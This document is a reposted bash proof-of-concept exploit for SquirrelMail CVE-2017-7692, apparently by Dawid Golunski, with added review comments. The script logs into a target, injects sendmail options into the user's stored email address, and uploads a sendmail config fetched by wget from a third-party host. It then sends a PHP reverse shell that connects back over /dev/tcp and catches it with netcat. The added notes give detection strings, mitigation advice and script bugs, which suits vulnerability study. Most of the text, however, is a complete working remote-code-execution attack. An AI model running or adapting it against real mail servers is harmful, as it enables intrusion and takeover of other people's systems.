SquirrelMail < 1.4.22 - Remote Code Execution
来源:https://legalhackers.com 作者:Golunski 发布时间:2017-04-24
|  | #!/bin/bash #
 int='\033[94m
 __                     __   __  __           __
 / /   ___  ____ _____ _/ /  / / / /___ ______/ /_____  __________
 / /   / _ \/ __ `/ __ `/ /  / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
 / /___/  __/ /_/ / /_/ / /  / __  / /_/ / /__/ ,< /  __/ /  (__  )
 /_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/
 /____/
 
 SquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692)
 
 SquirrelMail_RCE_exploit.sh (ver. 1.0)
 
 Discovered and coded by
 
 Dawid Golunski (@dawid_golunski)
 https://legalhackers.com
 
 ExploitBox project:
 https://ExploitBox.io
 
 \033[0m'
 
 # Quick and messy PoC for SquirrelMail webmail application.
 # It contains payloads for 2 vectors:
 # * File Write
 # * RCE
 # It requires user credentials and that SquirrelMail uses
 # Sendmail method as email delivery transport
 #
 #
 # Full advisory URL:
 # https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html
 # Exploit URL:
 # https://legalhackers.com/exploits/CVE-2017-7692/SquirrelMail_RCE_exploit.sh
 #
 # Tested on: # Ubuntu 16.04
 # squirrelmail package version:
 # 2:1.4.23~svn20120406-2ubuntu1.16.04.1
 #
 # Disclaimer:
 # For testing purposes only
 #
 #
 # -----------------------------------------------------------------
 #
 # Interested in vulns/exploitation?
 # Stay tuned for my new project - ExploitBox
 #
 #                        .;lc'
 #                    .,cdkkOOOko;.
 #                 .,lxxkkkkOOOO000Ol'
 #             .':oxxxxxkkkkOOOO0000KK0x:'
 #          .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
 #       ':oxxxxxxxxxxo;.       .:oOKKKXXXNNNNOl.
 #      '';ldxxxxxdc,.              ,oOXXXNNNXd;,.
 #     .ddc;,,:c;.         ,c:         .cxxc:;:ox:
 #     .dxxxxo,     .,   ,kMMM0:.  .,     .lxxxxx:
 #     .dxxxxxc     lW. oMMMMMMMK  d0     .xxxxxx:
 #     .dxxxxxc     .0k.,KWMMMWNo :X:     .xxxxxx:
 #     .dxxxxxc      .xN0xxxxxxxkXK,      .xxxxxx:
 #     .dxxxxxc    lddOMMMMWd0MMMMKddd.   .xxxxxx:
 #     .dxxxxxc      .cNMMMN.oMMMMx'      .xxxxxx:
 #     .dxxxxxc     lKo;dNMN.oMM0;:Ok.    'xxxxxx:
 #     .dxxxxxc    ;Mc   .lx.:o,    Kl    'xxxxxx:
 #     .dxxxxxdl;. .,               .. .;cdxxxxxx:
 #     .dxxxxxxxxxdc,.              'cdkkxxxxxxxx:
 #      .':oxxxxxxxxxdl;.       .;lxkkkkkxxxxdc,.
 #          .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
 #             .':oxxxxxxxxx.ckkkkkkkkxl,.
 #                 .,cdxxxxx.ckkkkkxc.
 #                    .':odx.ckxl,.
 #                        .,.'.
 #
 # https://ExploitBox.io
 #
 # https://twitter.com/Exploit_Box
 #
 # -----------------------------------------------------------------
 
 # -----------------------------------------------------------------
 # Review notes (defensive reading of this PoC):
 # * Vulnerability class, as far as this script shows it: the value the
 #   script stores in the user's "email address" preference (new_email_address,
 #   options.php below) contains sendmail option tokens and is later acted on
 #   by the Sendmail transport when a message is sent. Detection on the
 #   application side: stored preferences or POSTs to options.php whose
 #   address value contains " -X", " -C" or " -oQ".
 # * Mitigation: apply the vendor/distribution fix for CVE-2017-7692 (see the
 #   advisory URL above); the script itself states the Sendmail delivery
 #   method is a precondition, so deployments using SMTP delivery are not
 #   affected by this vector.
 # * Operational hygiene of the script: it writes fixed-name files under /tmp
 #   (/tmp/sqdata, which holds the session cookie; /tmp/smcnf-exp; /tmp/sheaders)
 #   and never removes them; the password is placed on the curl command line
 #   (visible in process listings); $URL is expanded unquoted throughout.
 # * No `set -e`/`set -u`; `$mail` is referenced at the attachment upload
 #   below but is never assigned anywhere in this file.
 # -----------------------------------------------------------------
 
 # Server-side directory where SquirrelMail keeps uploaded attachments; the
 # uploaded attachment id is appended to it for payload 2 (see the case below).
 sqspool="/var/spool/squirrelmail/attach/"
 
 # Print the coloured banner defined above.
 echo -e "$int"
 #echo -e "\033[94m \nSquirrelMail - Remote Code Execution PoC Exploit (CVE-2017-7692) \n"
 #echo -e "SquirrelMail_RCE_exploit.sh (ver. 1.0)\n"
 #echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m\n\n"
 
 
 # Base URL
 # Exactly one argument (the SquirrelMail base URL) is required; exit 2 otherwise.
 if [ $# -ne 1 ]; then
 echo -e "Usage: \n$0 SquirrelMail_URL"
 echo -e "Example: \n$0 http://target/squirrelmail/ \n"
 
 exit 2
 fi
 URL="$1"
 
 # Log in
 # Credentials are read interactively; -s suppresses echo for the password.
 echo -e "\n[*] Enter SquirrelMail user credentials"
 read -p  "user: " squser
 read -sp "pass: " sqpass
 
 # Response headers are saved to a fixed path (/tmp/sqdata) so the session
 # cookies can be parsed out below. The login is treated as failed only when
 # the response body contains the word "incorrect". Note the credentials go
 # into the -d argument unencoded, so characters such as '&' or '=' in them
 # would corrupt the form data.
 echo -e "\n\n[*] Logging in to SquirrelMail at $URL"
 curl -s -D /tmp/sqdata -d"login_username=$squser&secretkey=$sqpass&js_autodetect_results=1&just_logged_in=1" $URL/src/redirect.php | grep -q incorrect
 if [ $? -eq 0 ]; then
 echo "Invalid creds"
 exit 2
 fi
 # Pull the last SQMSESSID and "key" cookie values out of the saved headers.
 # NOTE(review): `grep key` matches any header line containing "key", not
 # only the Set-Cookie for the key cookie; the last match wins.
 sessid="`cat /tmp/sqdata | grep SQMSESS | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`"
 keyid="`cat /tmp/sqdata | grep key | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`"
 
 
 # Prepare Sendmail cnf
 #
 # * The config will launch php via the following stanza:
 #
 # Mlocal,   P=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,
 #       T=DNS/RFC822/X-Unix,
 #       A=php -- $u $h ${client_addr}
 #
 # The config file is fetched from a third-party host at run time over the
 # network with no integrity check, and stored at a fixed path. Its contents
 # are not part of this script; only the stanza quoted above is known here.
 wget -q -O/tmp/smcnf-exp https://legalhackers.com/exploits/sendmail-exploit.cf
 
 # Upload config
 # First fetch the anti-CSRF token (smtoken) from the compose page, then post
 # the downloaded file as an attachment. The attachment id is scraped from the
 # response; the 's:32' separator presumably targets a serialized 32-char
 # string. `$mail` is never set in this file, so send_to is sent empty.
 echo -e "\n\n[*] Uploading Sendmail config"
 token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/compose.php?mailbox=INBOX&startMessage=1" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `"
 attachid="`curl -H "Expect:" -s -b"SQMSESSID=$sessid; key=$keyid" -F"smtoken=$token" -F"send_to=$mail" -F"subject=attach" -F"body=test" -F"attachfile=@/tmp/smcnf-exp" -F"username=$squser" -F"attach=Add" $URL/src/compose.php | awk -F's:32' '{print $2}' | awk -F'"' '{print $2}' | tr -d '\n'`"
 # Anything shorter than 32 characters means the id was not found in the response.
 if [ ${#attachid} -lt 32 ]; then
 echo "Something went wrong. Failed to upload the sendmail file."
 exit 2
 fi
 
 # Create Sendmail cmd string according to selected payload
 echo -e "\n\n[?] Select payload\n"
 # SELECT PAYLOAD
 echo "1 - File write (into /tmp/sqpoc)"
 echo "2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)"
 echo
 read -p "[1-2] " pchoice
 
 # The address value that will be stored as the user's email address; the
 # tokens after the address are sendmail command-line options (the file-write
 # variant names /tmp/sqpoc, the RCE variant points -C at the uploaded
 # attachment in the spool). There is no default arm: any other input leaves
 # `payload` empty and the script carries on, and a non-numeric input makes
 # the `-eq` tests below error out.
 case $pchoice in
 1) payload="$squser@localhost   -oQ/tmp/    -X/tmp/sqpoc"
 ;;
 
 2) payload="$squser@localhost   -oQ/tmp/    -C$sqspool/$attachid"
 ;;
 esac
 
 # Listener address for payload 2 only; left unset for payload 1.
 if [ $pchoice -eq 2 ]; then
 echo
 read -p "Reverese shell IP: " reverse_ip
 read -p "Reverese shell PORT: " reverse_port
 fi
 
 # Reverse shell code
 # PHP sent as the message body. It is sent for both payload choices (see the
 # compose request below); with choice 1 reverse_ip/reverse_port are unset
 # and expand to empty strings inside it.
 phprevsh="
 <?php
 \$cmd = \"/bin/bash -c 'bash -i >/dev/tcp/$reverse_ip/$reverse_port 0<&1 2>&1 & '\";
 file_put_contents(\"/tmp/cmd\", 'export PATH=\"\$PATH\" ; export TERM=vt100 ;' . \$cmd);
 system(\"/bin/bash /tmp/cmd ; rm -f /tmp/cmd\");
 ?>"
 
 
 # Set sendmail params in user settings
 # A fresh smtoken is taken from the options page, then `payload` is stored as
 # new_email_address (this time URL-encoded). Success is judged by the word
 # 'Success' in the response; the 2>/dev/null applies to grep only.
 echo -e "\n[*] Injecting Sendmail command parameters"
 token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/options.php?optpage=personal" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `"
 curl -s -b"SQMSESSID=$sessid; key=$keyid" -d "smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit" --data-urlencode "new_email_address=$payload" "$URL/src/options.php?optpage=personal" | grep -q 'Success' 2>/dev/null
 if [ $? -ne 0 ]; then
 echo "Failed to inject sendmail parameters"
 exit 2
 fi
 
 # Send email which triggers the RCE vuln and runs phprevsh
 # The send is backgrounded and delayed 2s so the listener below can start
 # first. Response headers go to /tmp/sheaders. The options-page token from
 # above is reused for compose.php here.
 echo -e "\n[*] Sending the email to trigger the vuln"
 (sleep 2s && curl -s -D/tmp/sheaders -b"SQMSESSID=$sessid; key=$keyid" -d"smtoken=$token" -d"startMessage=1" -d"session=0" \
 -d"send_to=$squser@localhost" -d"subject=poc" --data-urlencode "body=$phprevsh" -d"send=Send" -d"username=$squser" $URL/src/compose.php) &
 
 # Payload 2 blocks in a foreground listener until the connection ends.
 # NOTE(review): `-l -p` is netcat-traditional syntax; other nc implementations
 # differ — confirm for the local nc.
 if [ $pchoice -eq 2 ]; then
 echo -e "\n[*] Waiting for shell on $reverse_ip port $reverse_port"
 nc -vv -l -p $reverse_port
 else
 echo -e "\n[*] The test file should have been written at /tmp/sqpoc"
 fi
 
 # Check the saved headers for the redirect SquirrelMail issues after a send.
 # NOTE(review): for choice 1 this runs immediately, before the 2s-delayed
 # background request has written /tmp/sheaders; a missing file makes grep
 # exit 2, not 1, so the error branch is skipped and a stale /tmp/sheaders
 # from an earlier run would also be read. The check is only meaningful after
 # the listener for choice 2 has returned.
 grep -q "302 Found" /tmp/sheaders
 if [ $? -eq 1 ]; then
 echo "There was a problem with sending email"
 exit 2
 fi
 
 
 # Done
 # The temporary files under /tmp are left in place.
 echo -e "\n[*] All done. Exiting"
 